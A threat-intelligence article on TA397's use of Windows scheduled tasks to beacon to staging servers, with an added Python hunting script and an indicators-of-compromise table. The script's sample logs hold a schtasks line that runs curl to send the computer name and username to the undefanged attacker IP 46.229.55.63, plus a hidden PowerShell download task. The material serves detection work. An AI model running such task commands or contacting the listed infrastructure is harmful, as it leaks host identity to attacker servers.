
Proofpoint's technical analysis shows that TA397 consistently uses Windows Scheduled Tasks (created with schtasks.exe) both to maintain persistence and to stage multi-stage malware payloads on victim systems.
Technical Overview
From October 2024 through April 2025, Proofpoint Threat Research observed numerous campaigns attributed to TA397 targeting governmental, diplomatic, and defense entities primarily in Europe, with spillover into China, Pakistan, and other countries significant to Indian strategic interests.
TA397 continuously refines its delivery methods, relying on spearphishing emails that carry malicious attachments or URLs.
These lure documents are highly localized and often spoof diplomatic or governmental correspondence, leveraging topical subject lines relating to foreign policy, defense contracts, and bilateral agreements.
Initial access is nearly always achieved via spearphishing, where recipients receive either a direct malicious attachment or a link to a file hosted on a legitimate service.
Opening the lure typically creates a scheduled task that invokes PowerShell, cmd.exe, or curl at a fixed interval (commonly every 16–19 minutes) to beacon to attacker-controlled staging domains.
The beacon almost always embeds unique host identifiers, typically the victim's computer name and username, in the outbound HTTP(S) request, usually to a PHP script on the C2 server.
Returning this data lets the operators manually triage and filter victims before deciding which hosts receive follow-up payloads.
TA397 displays operational adaptability, abusing various file types (e.g., MSC, LNK, CHM, IQY) for initial payload execution and leveraging recently disclosed vulnerabilities (such as CVE-2024-43572 “GrimResource” for MSC files) to broaden its infection vectors.
Despite this variety, the creation and management of scheduled tasks remain consistent hallmarks of its tradecraft.
Hands-On-Keyboard Activity
Once persistence is established, TA397 operators frequently begin manual, hands-on-keyboard activity within hours of initial compromise, almost exclusively during Indian Standard Time (IST) business hours.
Analysis of the executed commands shows staged system reconnaissance, checks for installed anti-virus products, and selective deployment of second-stage payloads, including wmRAT, MiyaRAT, KugelBlitz, the Demon agent, and BDarkRAT.
Payload delivery is highly targeted: only after successful host profiling and victim validation do operators push tailored malware suited to espionage objectives.
Infrastructure analysis shows a pattern of hosting C2 and staging domains with Let’s Encrypt certificates and distinctive PHP URI structures.
Domain registrations and certificate issuances largely occur during IST business hours, further reinforcing the attribution to an Indian nexus.
TA397’s activities demonstrate substantial overlap with other known Indian APTs, indicating tool-sharing within a broader ecosystem of state-sponsored operations.
The group’s masquerading as foreign government entities and use of authentic-seeming decoy documents underline a deep familiarity with international diplomatic protocols and ongoing geopolitical events.
Exfiltrated documents, ranging from tax records to military plans, underscore the strategic intent behind TA397's operations.
Detection opportunities include monitoring scheduled-task creation (schtasks.exe command lines, or Windows Security event 4698) for tasks that run PowerShell, cmd.exe, or curl on a short minute-based interval; outbound requests whose URL carries the computer name and username; and, as a weaker corroborating signal, Let's Encrypt certificates on newly registered domains contacted by those tasks (Let's Encrypt is widely used by legitimate sites, so it should not be alerted on alone).
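The following Python is an added example, not code from Proofpoint or from this article, that turns the beaconing behaviour described above and the detection opportunities just listed into runnable checks over constructed sample logs. It parses schtasks /create command lines (as a Sysmon process-creation event would surface them) and flags minute-cadence tasks in the 16–19 minute band whose action is PowerShell, cmd.exe, or curl; flags .php requests whose query string embeds the requesting host's computer name and username; and scans a proxy log for near-constant request intervals to the same URL. The log formats, field names, host name WIN-A7Q3, user jdoe, timestamps, and the example.invalid domain are all constructed; the svch.php URL reuses the IP from the IOC table below, undefanged, with the "..": separator between computer name and username as the page shows it.

```python
"""Hunting TA397-style scheduled-task beaconing in sample logs.

Added example, not code from Proofpoint or this article. Log formats,
field names and every event below are constructed for illustration.
"""
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

# Interpreters/downloaders the article reports in TA397 task actions.
LOLBINS = ("powershell", "cmd.exe", "curl")
BEACON_MIN, BEACON_MAX = 16, 19  # minutes; the interval band the article cites

_SC = re.compile(r"/sc\s+minute", re.I)
_MO = re.compile(r"/mo\s+(\d+)", re.I)
_TR = re.compile(r'/tr\s+(?:"([^"]*)"|(\S+))', re.I)
_PHP = re.compile(r"\.php(\?|$)", re.I)


def parse_schtasks(cmdline):
    """Return (interval_minutes, action) for a 'schtasks /create' command line
    that schedules on a minute cadence; None for anything else."""
    low = cmdline.lower()
    if "schtasks" not in low or "/create" not in low or not _SC.search(cmdline):
        return None
    mo, tr = _MO.search(cmdline), _TR.search(cmdline)
    if not (mo and tr):
        return None
    action = tr.group(1) if tr.group(1) is not None else tr.group(2)
    return int(mo.group(1)), action


def is_ta397_style_task(cmdline):
    """Minute-cadence task inside the 16-19 minute band whose action runs a
    script interpreter or curl (the shape the article describes)."""
    parsed = parse_schtasks(cmdline)
    if parsed is None:
        return False
    interval, action = parsed
    return BEACON_MIN <= interval <= BEACON_MAX and any(
        b in action.lower() for b in LOLBINS)


def url_carries_host_identity(url, hostname, username):
    """True when a .php request's query string embeds both the requesting
    machine's computer name and user name (the %computername%..%username% shape)."""
    if not _PHP.search(url) or "?" not in url:
        return False
    query = url.split("?", 1)[1].lower()
    return hostname.lower() in query and username.lower() in query


def periodic_beacons(proxy_events, tolerance=1.0):
    """Group requests by (source host, URL minus query) and return groups whose
    gaps are near-constant (within `tolerance` minutes of the median) and whose
    median gap sits in the 16-19 minute band.
    proxy_events: iterable of (iso_timestamp, hostname, username, url)."""
    groups = defaultdict(list)
    for ts, host, _user, url in proxy_events:
        groups[(host, url.split("?", 1)[0])].append(datetime.fromisoformat(ts))
    hits = []
    for key, times in groups.items():
        if len(times) < 3:  # need at least two gaps to judge regularity
            continue
        times.sort()
        gaps = [(b - a).total_seconds() / 60 for a, b in zip(times, times[1:])]
        m = median(gaps)
        if BEACON_MIN <= m <= BEACON_MAX and all(abs(g - m) <= tolerance for g in gaps):
            hits.append((key, round(m, 1)))
    return hits


# Constructed Sysmon-style process-creation command lines. The first reuses
# the svch.php indicator from the IOC table (undefanged); the rest are benign.
PROCESS_CMDLINES = [
    'schtasks /create /sc minute /mo 17 /tn "DsSvcCleanup" /f '
    '/tr "curl -s http://46.229.55.63/svch.php?li=%computername%..%username% -o %temp%\\svc.txt"',
    'schtasks /create /sc minute /mo 19 /tn "WinUpdateCheck" '
    '/tr "powershell -w hidden -c iwr http://example.invalid/index.php"',
    'schtasks /create /sc daily /st 09:00 /tn "NightlyBackup" /tr "C:\\Backup\\backup.exe"',
    'schtasks /create /sc minute /mo 5 /tn "AgentHeartbeat" /tr "C:\\Monitor\\agent.exe"',
]

# Constructed proxy log: (timestamp, source host, user, URL). Four svch.php
# requests 17 minutes apart, interleaved with ordinary browsing.
PROXY_EVENTS = [
    ("2025-01-14T09:04:00", "WIN-A7Q3", "jdoe", "http://46.229.55.63/svch.php?li=WIN-A7Q3..jdoe"),
    ("2025-01-14T09:10:00", "WIN-A7Q3", "jdoe", "https://www.microsoft.com/en-us/"),
    ("2025-01-14T09:12:00", "WIN-A7Q3", "jdoe", "https://www.microsoft.com/en-us/"),
    ("2025-01-14T09:21:00", "WIN-A7Q3", "jdoe", "http://46.229.55.63/svch.php?li=WIN-A7Q3..jdoe"),
    ("2025-01-14T09:38:00", "WIN-A7Q3", "jdoe", "http://46.229.55.63/svch.php?li=WIN-A7Q3..jdoe"),
    ("2025-01-14T09:40:00", "WIN-A7Q3", "jdoe", "https://www.microsoft.com/en-us/"),
    ("2025-01-14T09:55:00", "WIN-A7Q3", "jdoe", "http://46.229.55.63/svch.php?li=WIN-A7Q3..jdoe"),
]

if __name__ == "__main__":
    for cmd in PROCESS_CMDLINES:
        print("TASK  ", is_ta397_style_task(cmd), cmd[:60])
    for _ts, host, user, url in PROXY_EVENTS:
        if url_carries_host_identity(url, host, user):
            print("IDENT ", url)
    print("BEACON", periodic_beacons(PROXY_EVENTS))
```

The periodicity check deliberately ignores the query string when grouping, because the identifier the task sends is constant per host and would otherwise be needed in the grouping key; in a real deployment the interval band and the LOLBIN list belong in a tunable allowlist rather than hard-coded constants, since legitimate agents also use minute-cadence tasks.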
Indicators of Compromise (IOC)
| Indicator | Type | Description | First Seen |
|---|---|---|---|
| mnemautoregsvc[.]com | Domain | Staging domain | Oct 2024 |
| jacknwoods[.]com | Domain | Staging domain | Nov 2024 |
| 1b67fc55fd050d011d6712ac17315112767cac8bbe059967b70147610933b6c1 | SHA256 | LNK scheduled task loader | Dec 2024 |
| 7c5dde52845ecae6c80c70af2200d34ef0e1bc6cbf3ead1197695b91acd22a67 | SHA256 | CHM scheduled task loader | Dec 2024 |
| hxxp://46[.]229[.]55[.]63/svch.php?li=%computername%[.][.]%username% | URL | Payload delivery URL | Dec 2024 |
| utizviewstation[.]com | Domain | Staging domain | Feb 2025 |
| blucollinsoutien[.]com | Domain | Staging domain | Mar 2025 |
| princecleanit[.]com | Domain | Staging domain | Mar 2025 |
| woodstocktutors[.]com | Domain | Staging domain | Apr 2025 |
| warsanservices[.]com | Domain | Staging domain | Apr 2025 |
| c9612051b3956ac8722d8be7994634b7c940be07ca26e2fc8d0d5c94db2e4682 | SHA256 | CHM scheduled task loader | May 2025 |
The post TA397 Hackers Use Scheduled Tasks to Deploy Malware on Victim Machines appeared first on Cyber Security News.
